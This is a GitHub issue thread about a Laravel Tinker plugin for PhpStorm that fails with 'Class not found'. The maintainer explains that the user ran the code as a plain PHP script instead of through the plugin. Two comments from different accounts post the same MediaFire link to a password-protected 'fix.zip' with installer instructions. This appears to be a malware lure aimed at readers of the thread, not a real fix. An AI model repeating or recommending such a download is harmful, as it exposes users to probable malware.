### ISSUE TITLE
[Bug]: 

### ISSUE THREAD

**Issue by richardhulbert** [Roboroads/laravel-tinker#365]
### Short bug description

Tinker cannot find my classes so fails

### Extended bug description

```php 
use \App\Models\Page;
Page::find(3);
```
results in
```
Fatal error: Uncaught Error: Class "App\Models\Page" not found in /in/aiERb:4
Stack trace:
#0 {main}
  thrown in /in/aiERb on line 4
<br/><i>Process exited with code <b title="Generic Error">255</b>.</i>
```
php is installed via brew
PHP 8.1.29 (cli)
@ /opt/homebrew/bin/php

Obviously this is something to do with my set up as others using Tinker with no probs. `php artisan tinker` works fine

Any suggestions?

Ta

Richard

### Your project is not the problem

- [X] I tried using a fresh laravel install - I'm fairly certain it has nothing to do with my project.

### How to reproduce?

```php 
use \App\Models\Page;
Page::find(3);
```

### Expected behavior

```
 App\Models\Page {#6195
    id: 3,
    prime: 1,
    user_id: 1,
    title: "Home",
    slug: "/",
    template_id: 1,
```

### IDE & Version

PhpStorm 2024.1.5

### PHP Version

8.1

### OS and version

mac 13.6.9 (22G830)

### Laravel Tinker plugin version

2.7.3

### Interpreter type

Local

### Laravel Version

9.52.16

### Tinker version

2.7.3

### Psysh version

v0.12.4

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Skyslycer** [comment]
Hi, same issue here. Similar simple artisan code. When I press run it just says that it can't find the file.
`PHP Fatal error:  Uncaught Error: Class "App\Models\Book" not found in /home/xxx/.config/JetBrains/PhpStorm2024.2/laravel-tinker/LaravelTinkerConsole.php:5`

Please fix this. Thank you!

**Comment by Roboroads** [comment]
You both are not executing through the tinker plugin, but running the PHP script as a PHP script. The tinker plugin adds the autoloader and laravel inits etc. to your code before executing, which a normal run does not.

Try the shortkey Ctrl+Shift+T or press the green tinker button in the gutter at line 1 of your tinker console.

**Comment by Roboroads** [comment]
I added a header for this issue in the FAQ in https://github.com/Roboroads/laravel-tinker/issues/250

**Comment by richardhulbert** [comment]
👍🏼😬 sorry
